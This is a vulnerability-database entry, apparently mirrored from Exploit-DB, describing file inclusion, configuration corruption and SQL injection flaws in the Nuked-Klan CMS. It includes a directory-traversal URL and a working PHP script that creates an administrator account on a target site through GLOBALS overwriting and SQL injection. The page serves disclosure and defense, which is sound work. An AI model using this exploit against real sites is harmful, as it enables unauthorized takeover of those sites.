header-logo
Suggest Exploit
vendor:
Nuked-Klan
by:
Unknown
7.5
CVSS
HIGH
Information Disclosure, Configuration File Corruption, SQL Injection
98
CWE
Product Name: Nuked-Klan
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:nuked-klan_project:nuked_klan
Metasploit:
Other Scripts:
Platforms Tested:

Nuked-Klan multiple vulnerabilities

The Nuked-Klan application is prone to multiple vulnerabilities that include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files, and an SQL injection vulnerability. The vulnerability allows attackers to include local files by manipulating the 'user_langue' parameter in the 'index.php' file. An attacker can also create an admin account by overwriting the 'GLOBALS' variable. The provided exploit code demonstrates how an attacker can create an admin account. This vulnerability can lead to unauthorized access and control of the application. The exploit code is written in PHP.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to the latest version of Nuked-Klan and apply any available patches or security updates. Additionally, input validation and sanitization techniques should be implemented to prevent SQL injection attacks and unauthorized file inclusions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------